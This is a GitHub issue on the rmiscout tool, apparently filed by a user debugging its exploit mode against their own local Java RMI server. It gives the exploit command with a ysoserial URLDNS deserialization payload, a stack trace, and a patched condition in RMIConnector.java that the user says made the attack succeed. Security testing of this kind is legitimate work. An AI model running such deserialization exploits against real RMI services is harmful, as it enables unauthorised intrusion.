Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Is RMIConnector process logic get mistake? #13

Open
xiaopan233 opened this issue Aug 12, 2021 · 0 comments
Open

Is RMIConnector process logic get mistake? #13

xiaopan233 opened this issue Aug 12, 2021 · 0 comments

Comments

@xiaopan233
Copy link

enviroment: jdk8u202
running command: exploit -s "void hello(com.PersonDTO personDTO)" -p ysoserial.payloads.URLDNS -c "http://xxx.xxx.xxx" -n myRmiService 127.0.0.1 1099

And I get a error:

java.lang.IllegalArgumentException: Can not set java.rmi.server.RemoteRef field java.rmi.server.RemoteObject.ref to com.sun.proxy.$Proxy0
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
	at sun.reflect.UnsafeFieldAccessorImpl.ensureObj(UnsafeFieldAccessorImpl.java:58)
	at sun.reflect.UnsafeObjectFieldAccessorImpl.get(UnsafeObjectFieldAccessorImpl.java:36)
	at java.lang.reflect.Field.get(Field.java:393)
	at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:363)
	at com.bishopfox.rmiscout.RMIConnector.exploit(RMIConnector.java:270)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:325)

My RMI Server code is the following, very simple

public class Main {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(1099);
        MyRmiService myRmiService = new MyRmiServiceImpl();
        registry.bind("myRmiService", myRmiService);
   }
}

I find out the following code when I debug the error:
RMIConnector.java

Remote stub = pair.getValue();
......
// Bypass internal call flow for custom params
RemoteRef ref = null;
if (interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

rmiscout always get into the true block. But stub is Proxy with implement Remote type, It CAN NOT get a ref Field.That cause the error.

I think the false block is the better to handle stub.So I change the code in RMIConnector.java

//add a !
if (!interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

Rerun rmiscout, It works! The RMI Server is attacked successful.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xiaopan233